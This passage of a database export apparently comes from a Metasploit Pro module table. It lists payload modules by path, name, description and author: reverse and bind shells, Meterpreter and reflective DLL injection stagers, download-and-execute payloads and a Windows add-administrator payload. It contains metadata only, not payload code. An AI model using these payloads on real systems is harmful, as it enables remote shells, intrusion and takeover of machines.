00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/shell_bind_tcp.rb","payload","osx/x86/shell_bind_tcp","payload/osx/x86/shell_bind_tcp","OS X Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2150,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/shell_find_port.rb","payload","osx/x86/shell_find_port","payload/osx/x86/shell_find_port","OS X Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2151,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb","payload","osx/x86/shell_reverse_tcp","payload/osx/x86/shell_reverse_tcp","OS X Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2152,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/bind_tcp.rb","payload","osx/x86/vforkshell/bind_tcp","payload/osx/x86/vforkshell/bind_tcp","OS X (vfork) Command Shell, Bind TCP Stager",300,"Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2153,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/osx/x86/reverse_tcp.rb","payload","osx/x86/vforkshell/reverse_tcp","payload/osx/x86/vforkshell/reverse_tcp","OS X (vfork) Command Shell, Reverse TCP Stager",300,"Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"ddz " 2154,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb","payload","osx/x86/vforkshell_bind_tcp","payload/osx/x86/vforkshell_bind_tcp","OS X (vfork) Command Shell, Bind TCP Inline",300,"Listen for a connection, vfork if necessary, and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz " 2155,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb","payload","osx/x86/vforkshell_reverse_tcp","payload/osx/x86/vforkshell_reverse_tcp","OS X (vfork) Command Shell, Reverse TCP Inline",300,"Connect back to attacker, vfork if necessary, and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"ddz " 2156,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_perl.rb","payload","php/bind_perl","payload/php/bind_perl","PHP Command Shell, Bind TCP (via Perl)",300,"Listen for a connection and spawn a command shell via perl (persistent)","BSD License","f",,,,,"t",,"Samy , cazz " 2157,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_perl_ipv6.rb","payload","php/bind_perl_ipv6","payload/php/bind_perl_ipv6","PHP Command Shell, Bind TCP (via perl) IPv6",300,"Listen for a connection and spawn a command shell via perl (persistent) over IPv6","BSD License","f",,,,,"t",,"Samy , cazz " 2158,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_php.rb","payload","php/bind_php","payload/php/bind_php","PHP Command Shell, Bind TCP (via PHP)",300,"Listen for a connection and spawn a command shell via php","BSD License","f",,,,,"t",,"diaul , egypt " 2159,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/bind_php_ipv6.rb","payload","php/bind_php_ipv6","payload/php/bind_php_ipv6","PHP Command Shell, Bind TCP (via php) IPv6",300,"Listen for a connection and spawn a command shell via php (IPv6)","BSD License","f",,,,,"t",,"diaul , egypt " 2160,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/download_exec.rb","payload","php/download_exec","payload/php/download_exec","PHP Executable Download and Execute",300,"Download an EXE from an HTTP URL and execute it","BSD License","f",,,,,"t",,"egypt " 2161,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/exec.rb","payload","php/exec","payload/php/exec","PHP Execute Command ",300,"Execute a single system command","BSD License","f",,,,,"t",,"egypt " 2162,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/php/bind_tcp.rb","payload","php/meterpreter/bind_tcp","payload/php/meterpreter/bind_tcp","PHP Meterpreter, Bind TCP Stager",300,"Listen for a connection, Run a meterpreter server in PHP","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt " 2163,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/php/bind_tcp_ipv6.rb","payload","php/meterpreter/bind_tcp_ipv6","payload/php/meterpreter/bind_tcp_ipv6","PHP Meterpreter, Bind TCP Stager IPv6",300,"Listen for a connection over IPv6, Run a meterpreter server in PHP","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt " 2164,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/php/reverse_tcp.rb","payload","php/meterpreter/reverse_tcp","payload/php/meterpreter/reverse_tcp","PHP Meterpreter, PHP Reverse TCP Stager",300,"Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP","[""Metasploit Framework License (BSD)""]","f",,,,,"t",,"egypt " 2165,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/meterpreter_reverse_tcp.rb","payload","php/meterpreter_reverse_tcp","payload/php/meterpreter_reverse_tcp","PHP Meterpreter, Reverse TCP Inline",300,"Connect back to attacker and spawn a Meterpreter server (PHP)","Metasploit Framework License (BSD)","f",,,,,"t",,"egypt " 2166,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/reverse_perl.rb","payload","php/reverse_perl","payload/php/reverse_perl","PHP Command, Double reverse TCP connection (via Perl)",300,"Creates an interactive shell via perl","BSD License","f",,,,,"t",,"cazz " 2167,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/reverse_php.rb","payload","php/reverse_php","payload/php/reverse_php","PHP Command Shell, Reverse TCP (via PHP)",300,"Reverse PHP connect back shell with checks for disabled functions","BSD License","f",,,,,"t",,"egypt " 2168,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/php/shell_findsock.rb","payload","php/shell_findsock","payload/php/shell_findsock","PHP Command Shell, Find Sock",300,"Spawn a shell on the established connection to the webserver. Unfortunately, this payload can leave conspicuous evil-looking entries in the apache error logs, so it is probably a good idea to use a bind or reverse shell unless firewalls prevent them from working. The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache and may not work on other Debian-based distributions. Only tested on Apache but it might work on other web servers that leak file descriptors to child processes.","BSD License","f",,,,,"t",,"egypt " 2169,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb","payload","python/shell_reverse_tcp_ssl","payload/python/shell_reverse_tcp_ssl","Unix Command Shell, Reverse TCP SSL (via python)",300,"Creates an interactive shell via python, uses SSL, encodes with base64 by design.","BSD License","f",,,,,"t",,"RageLtMan" 2170,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_bind_tcp.rb","payload","ruby/shell_bind_tcp","payload/ruby/shell_bind_tcp","Ruby Command Shell, Bind TCP",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , kris katterjohn " 2171,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb","payload","ruby/shell_bind_tcp_ipv6","payload/ruby/shell_bind_tcp_ipv6","Ruby Command Shell, Bind TCP IPv6",300,"Continually listen for a connection and spawn a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , kris katterjohn " 2172,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_reverse_tcp.rb","payload","ruby/shell_reverse_tcp","payload/ruby/shell_reverse_tcp","Ruby Command Shell, Reverse TCP",300,"Connect back and create a command shell via Ruby","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , kris katterjohn " 2173,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb","payload","ruby/shell_reverse_tcp_ssl","payload/ruby/shell_reverse_tcp_ssl","Ruby Command Shell, Reverse TCP SSL",300,"Connect back and create a command shell via Ruby, uses SSL","Metasploit Framework License (BSD)","f",,,,,"t",,"RageLtMan" 2174,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb","payload","solaris/sparc/shell_bind_tcp","payload/solaris/sparc/shell_bind_tcp","Solaris Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2175,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/sparc/shell_find_port.rb","payload","solaris/sparc/shell_find_port","payload/solaris/sparc/shell_find_port","Solaris Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2176,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb","payload","solaris/sparc/shell_reverse_tcp","payload/solaris/sparc/shell_reverse_tcp","Solaris Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"vlad902 " 2177,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb","payload","solaris/x86/shell_bind_tcp","payload/solaris/x86/shell_bind_tcp","Solaris Command Shell, Bind TCP Inline",300,"Listen for a connection and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2178,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/x86/shell_find_port.rb","payload","solaris/x86/shell_find_port","payload/solaris/x86/shell_find_port","Solaris Command Shell, Find Port Inline",300,"Spawn a shell on an established connection","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2179,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb","payload","solaris/x86/shell_reverse_tcp","payload/solaris/x86/shell_reverse_tcp","Solaris Command Shell, Reverse TCP Inline",300,"Connect back to attacker and spawn a command shell","Metasploit Framework License (BSD)","f",,,,,"t",,"Ramon de C Valle " 2180,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/tty/unix/interact.rb","payload","tty/unix/interact","payload/tty/unix/interact","Unix TTY, Interact with Established Connection",300,"Interacts with a TTY on an established socket connection","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2181,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/adduser.rb","payload","windows/adduser","payload/windows/adduser","Windows Execute net user /ADD",300,"Create a new user and add them to local administration group. Note: The specified password is checked for common complexity requirements to prevent the target machine rejecting the user for failing to meet policy requirements. Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)","[""Metasploit Framework License (BSD)""]","t",,,,,"t",,"Chris John Riley, hdm , sf , vlad902 " 2182,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/dllinject/bind_ipv6_tcp","payload/windows/dllinject/bind_ipv6_tcp","Reflective DLL Injection, Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2183,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/dllinject/bind_nonx_tcp","payload/windows/dllinject/bind_nonx_tcp","Reflective DLL Injection, Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 " 2184,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/dllinject/bind_tcp","payload/windows/dllinject/bind_tcp","Reflective DLL Injection, Bind TCP Stager",300,"Listen for a connection, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2185,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/dllinject/bind_tcp_rc4","payload/windows/dllinject/bind_tcp_rc4","Reflective DLL Injection, Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2186,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/dllinject/find_tag","payload/windows/dllinject/find_tag","Reflective DLL Injection, Find Tag Ordinal Stager",300,"Use an established connection, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape " 2187,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/dllinject/reverse_http","payload/windows/dllinject/reverse_http","Reflective DLL Injection, Reverse HTTP Stager",300,"Tunnel communication over HTTP, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf " 2188,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/dllinject/reverse_ipv6_http","payload/windows/dllinject/reverse_ipv6_http","Reflective DLL Injection, Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf " 2189,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/dllinject/reverse_ipv6_tcp","payload/windows/dllinject/reverse_ipv6_tcp","Reflective DLL Injection, Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2190,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/dllinject/reverse_nonx_tcp","payload/windows/dllinject/reverse_nonx_tcp","Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , vlad902 " 2191,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/dllinject/reverse_ord_tcp","payload/windows/dllinject/reverse_ord_tcp","Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , spoonm " 2192,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/dllinject/reverse_tcp","payload/windows/dllinject/reverse_tcp","Reflective DLL Injection, Reverse TCP Stager",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2193,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/dllinject/reverse_tcp_allports","payload/windows/dllinject/reverse_tcp_allports","Reflective DLL Injection, Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2194,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/dllinject/reverse_tcp_dns","payload/windows/dllinject/reverse_tcp_dns","Reflective DLL Injection, Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2195,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/dllinject/reverse_tcp_rc4","payload/windows/dllinject/reverse_tcp_rc4","Reflective DLL Injection, Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2196,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/dllinject/reverse_tcp_rc4_dns","payload/windows/dllinject/reverse_tcp_rc4_dns","Reflective DLL Injection, Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject a DLL via a reflective loader","Metasploit Framework License (BSD)","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","RageLtMan, hdm , mihi, sf , skape " 2197,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/dns_txt_query_exec.rb","payload","windows/dns_txt_query_exec","payload/windows/dns_txt_query_exec","DNS TXT Record Payload Download and Execution",300,"Performs a TXT query against a series of DNS record(s) and executes the returned payload","Metasploit Framework License (BSD)","f",,,,,"t",,"corelanc0d3r " 2198,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/download_exec.rb","payload","windows/download_exec","payload/windows/download_exec","Windows Executable Download (http,https,ftp) and Execute",300,"Download an EXE from an HTTP(S)/FTP URL and execute it","Metasploit Framework License (BSD)","f",,,,,"t",,"corelanc0d3r " 2199,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/exec.rb","payload","windows/exec","payload/windows/exec","Windows Execute Command",300,"Execute an arbitrary command","Metasploit Framework License (BSD)","f",,,,,"t",,"sf , vlad902 " 2200,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/loadlibrary.rb","payload","windows/loadlibrary","payload/windows/loadlibrary","Windows LoadLibrary Path",300,"Load an arbitrary library path","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , sf " 2201,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/messagebox.rb","payload","windows/messagebox","payload/windows/messagebox","Windows MessageBox",300,"Spawns a dialog via MessageBox using a customizable title, text & icon","Metasploit Framework License (BSD)","f",,,,,"t",,"corelanc0d3r , jduck " 2202,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_ipv6_tcp.rb","payload","windows/meterpreter/bind_ipv6_tcp","payload/windows/meterpreter/bind_ipv6_tcp","Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)",300,"Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2203,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_nonx_tcp.rb","payload","windows/meterpreter/bind_nonx_tcp","payload/windows/meterpreter/bind_nonx_tcp","Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)",300,"Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape , vlad902 " 2204,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp.rb","payload","windows/meterpreter/bind_tcp","payload/windows/meterpreter/bind_tcp","Windows Meterpreter (Reflective Injection), Bind TCP Stager",300,"Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2205,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/bind_tcp_rc4.rb","payload","windows/meterpreter/bind_tcp_rc4","payload/windows/meterpreter/bind_tcp_rc4","Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 stage encryption)",300,"Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2206,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/findtag_ord.rb","payload","windows/meterpreter/find_tag","payload/windows/meterpreter/find_tag","Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager",300,"Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape " 2207,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_http.rb","payload","windows/meterpreter/reverse_http","payload/windows/meterpreter/reverse_http","Windows Meterpreter (Reflective Injection), Reverse HTTP Stager",300,"Tunnel communication over HTTP, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2208,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_https.rb","payload","windows/meterpreter/reverse_https","payload/windows/meterpreter/reverse_https","Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager",300,"Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2209,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_http.rb","payload","windows/meterpreter/reverse_ipv6_http","payload/windows/meterpreter/reverse_ipv6_http","Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)",300,"Tunnel communication over HTTP and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2210,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_https.rb","payload","windows/meterpreter/reverse_ipv6_https","payload/windows/meterpreter/reverse_ipv6_https","Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)",300,"Tunnel communication over HTTP using SSL and IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2211,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb","payload","windows/meterpreter/reverse_ipv6_tcp","payload/windows/meterpreter/reverse_ipv6_tcp","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)",300,"Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2212,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_nonx_tcp.rb","payload","windows/meterpreter/reverse_nonx_tcp","payload/windows/meterpreter/reverse_nonx_tcp","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)",300,"Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape , vlad902 " 2213,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_ord_tcp.rb","payload","windows/meterpreter/reverse_ord_tcp","payload/windows/meterpreter/reverse_ord_tcp","Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","sf , skape , spoonm " 2214,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp.rb","payload","windows/meterpreter/reverse_tcp","payload/windows/meterpreter/reverse_tcp","Windows Meterpreter (Reflective Injection), Reverse TCP Stager",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2215,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_allports.rb","payload","windows/meterpreter/reverse_tcp_allports","payload/windows/meterpreter/reverse_tcp_allports","Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager",300,"Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2216,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_dns.rb","payload","windows/meterpreter/reverse_tcp_dns","payload/windows/meterpreter/reverse_tcp_dns","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , sf , skape " 2217,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4.rb","payload","windows/meterpreter/reverse_tcp_rc4","payload/windows/meterpreter/reverse_tcp_rc4","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 stage encryption)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","hdm , mihi, sf , skape " 2218,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb","payload","windows/meterpreter/reverse_tcp_rc4_dns","payload/windows/meterpreter/reverse_tcp_rc4_dns","Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 stage encryption DNS)",300,"Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)","[""Metasploit Framework License (BSD)""]","f",,,,,"t","URL-https://github.com/stephenfewer/ReflectiveDLLInjection","RageLtMan, hdm , mihi, sf , skape " 2219,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/metsvc_bind_tcp.rb","payload","windows/metsvc_bind_tcp","payload/windows/metsvc_bind_tcp","Windows Meterpreter Service, Bind TCP",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2220,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/payloads/singles/windows/metsvc_reverse_tcp.rb","payload","windows/metsvc_reverse_tcp","payload/windows/metsvc_reverse_tcp","Windows Meterpreter Service, Reverse TCP Inline",300,"Stub payload for interacting with a Meterpreter Service","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 2221,"2013-05-07 